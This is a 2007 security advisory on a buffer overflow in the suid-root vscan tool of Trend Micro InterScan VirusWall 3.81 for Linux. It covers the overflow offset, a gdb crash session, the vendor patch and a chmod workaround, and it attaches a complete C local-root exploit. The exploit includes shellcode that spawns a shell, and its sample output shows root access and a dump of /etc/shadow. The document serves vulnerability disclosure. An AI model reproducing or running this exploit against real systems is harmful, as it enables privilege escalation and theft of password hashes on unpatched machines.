<<< Date Index >>>     <<< Thread Index >>>

Buffer overflow in VSAPI library of Trend Micro VirusWall 3.81 for Linux



I - TITLE

Security advisory: Buffer overflow in VSAPI library of Trend Micro VirusWall 
3.81 for Linux

II - SUMMARY

Description: Local buffer overflow vulnerability in VSAPI library allows 
arbitrary code execution and leads to privilege escalation

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), 
http://www.devtarget.org

Date: January 25th, 2007

Severity: Medium

References: http://www.devtarget.org/trendmicro-advisory-01-2007.txt

III - OVERVIEW

The Trend Micro VirusWall is a software solution to block viruses, spyware, 
spam and various other kinds of threats at the Internet gateway. More 
information about the product can be found online at 
http://www.trendmicro.com/en/products/gateway/isvw/evaluate/overview.htm.

IV - DETAILS

The product "InterScan VirusWall 3.81 for Linux" ships a legacy library 
called "libvsapi.so" which is vulnerable to a memory corruption 
vulnerability. One of the applications that apparently uses this library is 
called "vscan" which is set suid root by default. It was discovered that this 
supporting program is prone to a classic buffer overflow vulnerability when a 
particularly long command-line argument is being passed and the application 
utilizes the flawed library to attempt to copy that data into a finite 
buffer. On a Debian 3.1 test system for instance an attacker is required to 
supply 1116 + 4 bytes to completely overwrite the EIP register and thus 
execute arbitrary code with root level privileges:

# /opt/trend/ISBASE/IScan.BASE/vscan -v
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446
No scan target specified!! do nothing.

# gdb /opt/trend/ISBASE/IScan.BASE/vscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details. This GDB was configured as "i386-linux"...(no debugging symbols
found) Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x1116 . "B"x4'`
Starting program: /opt/trend/ISBASE/IScan.BASE/vscan `perl -e 'print
"A"x1116 . "B"x4'`
(no debugging symbols found)
Virus Scanner v3.1, VSAPI v6.810-1005
Trend Micro Inc. 1996,1997
        Pattern version 684
        Pattern number 56446

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info registers
eax            0xffffffff       -1
ecx            0x24     36
edx            0x40277560       1076327776
ebx            0xbffffa03       -1073743357
esp            0xbffff818       0xbffff818
ebp            0x41414141       0x41414141
esi            0xbffff838       -1073743816
edi            0x804f008        134541320
eip            0x42424242       0x42424242
eflags         0x287    647
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

V - ANALYSIS

The severity of this vulnerability is probably "medium" as by default the 
vscan file is only executable by the root user as well as members of 
the "iscan" group which is created during the installation of the software:

# ls -la /opt/trend/ISBASE/IScan.BASE/vscan
-r-sr-x---  1 root iscan 24400 2003-12-20 03:53
/opt/trend/ISBASE/IScan.BASE/vscan

However administrators may potentially have changed the default permissions 
and thus granted all local users the privilege to execute the file. If this 
library is also used by other applications they may also be flawed 
(unchecked).

VI - EXPLOIT CODE

An exploit for this vulnerability is attached to this email and can also be 
found online at http://www.devtarget.org/tmvwall381v3_exp.c. It was 
successfully tested on Debian Linux 3.1 with kernel 2.6.8 and leads to a 
local privilege escalation:

sebastian@debian31:~$ ./tmvwall381v3_exp

Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>
Date: January 3rd, 2007

Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way,
your current user id is 5002.

Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege
level with id or whoami!

Virus Scanner v3.1, VSAPI v8.310-1002
Trend Micro Inc. 1996,1997
Pattern number 4.155.00

sh-2.05b# id
uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan)

sh-2.05b# cat /etc/shadow

root:***REMOVED***:13372:0:99999:7:::
daemon:*:13372:0:99999:7:::
bin:*:13372:0:99999:7:::
sys:*:13372:0:99999:7:::
sync:*:13372:0:99999:7:::
games:*:13372:0:99999:7:::

[...]

iscan:!:13500:0:99999:7:::
sebastian:***REMOVED***:13500:0:99999:7:::

VII - WORKAROUND/FIX

To address this problem, the vendor has released a patch called "InterScan 
VirusWall 3.81 for Linux Security Patch - VSAPI module" which is available at 
http://www.trendmicro.com/download/product.asp?productid=13&show=patch and 
which will replace the flawed library libvsapi.so with a newer version. Hence 
all users of the VirusWall product are asked to test and install this patch 
as soon as possible. Trend Micro also created a knowledge base article that 
covers the problem (see 
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034124&id=EN-1034124).
 

Furthermore as a temporary workaround one may also simply remove the suid bit 
from the vscan file and thus render any attack virtually useless by executing

# chmod -s /opt/trend/ISBASE/IScan.BASE/vscan

The same holds true for any other (suid root) application that uses this 
library.

VIII - DISCLOSURE TIMELINE

02. January 2007 - Notified security@xxxxxxxxxxxxxx
05. January 2007 - Vulnerability confirmed
21. January 2007 - Release of patch
25. January 2007 - Public disclosure 
/*

    Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on 
Linux)

    Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>

    Date: January 3rd, 2007

    Severity: Medium

    Description:

    The product "InterScan VirusWall 3.81 for Linux" ships a library called 
    "libvsapi.so" which is vulnerable to a memory corruption vulnerability.

    One of the applications that apparently uses this library is called "vscan"
    which is set suid root by default. It was discovered that this supporting
    program is prone to a classic buffer overflow vulnerability when a 
particularly
    long command-line argument is being passed and the application utilizes the 
flawed
    library to attempt to copy that data into a finite buffer. 

    As vscan is set suid root, this leads to arbitrary code execution with root 
level
    privileges. However the severity of this vulnerability is probably "medium" 
as by default
    the vscan file is only executable by the root user as well as members of 
the "iscan"
    group which is created during the installation of the software.

    Example:

    sebastian@debian31:~$ ./tmvwall381v3_exp

    Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)
    Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>
    Date: January 3rd, 2007

    Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your 
current user id is 5002.

    Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your 
privilege level with id or whoami!
    Virus Scanner v3.1, VSAPI v8.310-1002
    Trend Micro Inc. 1996,1997
        Pattern number 4.155.00

    sh-2.05b# id
    uid=5002(sebastian) gid=100(users) euid=0(root) 
groups=100(users),5001(iscan)

    sh-2.05b# cat /etc/shadow

    root:***REMOVED***:13372:0:99999:7:::
    daemon:*:13372:0:99999:7:::
    bin:*:13372:0:99999:7:::
    sys:*:13372:0:99999:7:::
    sync:*:13372:0:99999:7:::
    games:*:13372:0:99999:7:::
    man:*:13372:0:99999:7:::
    lp:*:13372:0:99999:7:::
    mail:*:13372:0:99999:7:::
    news:*:13372:0:99999:7:::
    uucp:*:13372:0:99999:7:::
    proxy:*:13372:0:99999:7:::
    www-data:*:13372:0:99999:7:::
    backup:*:13372:0:99999:7:::
    list:*:13372:0:99999:7:::
    irc:*:13372:0:99999:7:::
    gnats:*:13372:0:99999:7:::
    nobody:*:13372:0:99999:7:::
    Debian-exim:!:13372:0:99999:7:::
    sshd:!:13372:0:99999:7:::
    postfix:!:13500:0:99999:7:::
    mysql:!:13500:0:99999:7:::
    vmail:!:13500:0:99999:7:::
    amavis:!:13500:0:99999:7:::
    iscan:!:13500:0:99999:7:::
    sebastian:***REMOVED***:13500:0:99999:7:::

    Credits:

    Must go to Aleph One for the shellcode and mercy for bits of the code.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan"

// Shellcode by Aleph One
char shellcode[] = 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
                   
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
                   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

}

int main(int argc, char *argv[], char **envp) {

    // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP)
    int buff = 1120;

    // Address of the shellcode
    unsigned long addr;

    // Temporarily used to add nops etc.
    char *ptr;

    printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 
on Linux)\n");
    printf("Author: Sebastian Wolfgarten, <sebastian@xxxxxxxxxxxxxx>\n");
    printf("Date: January 3rd, 2007\n\n");

    // Check permissions on vscan executable, if this fails exploitation is 
infeasible.
    if (access(vscan, 01) != -1) {

        printf("Okay, %s is executable and by the way, your current user id is 
%d.\n",vscan,getuid());

        // Allocate memory for filling the buffer
        if((ptr = (char *)malloc(buff)) == NULL) {

                printf("Error allocating memory!\n");
                exit(-1);

        }

        // Determine the address of the shellcode with the inline assembly above
        addr = get_sp();

        // Add the NOP's to the buffer
        memset(ptr, NOP, buff);

        // Add the shellcode
        memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, 
strlen(shellcode));

        // The return address
        *(long *)&ptr[buff - 4] = addr;

        // Off we go, execute the vulnerable program
        printf("\nExecuting %s. Afterwards check your privilege level with id 
or whoami!\n",vscan);
        execl(vscan, "vscan", ptr, NULL);

    } else {

        printf("Exploit failed. You seem not to have enough privileges to 
execute %s, sorry.\n",vscan);
        printf("Hint: Ask your local admin to add yourself to the iscan group 
or let him make the vscan binary world-executable.\n");
        printf("Then try again :-)\n\n");
        exit(1);

    }

    return 0;

}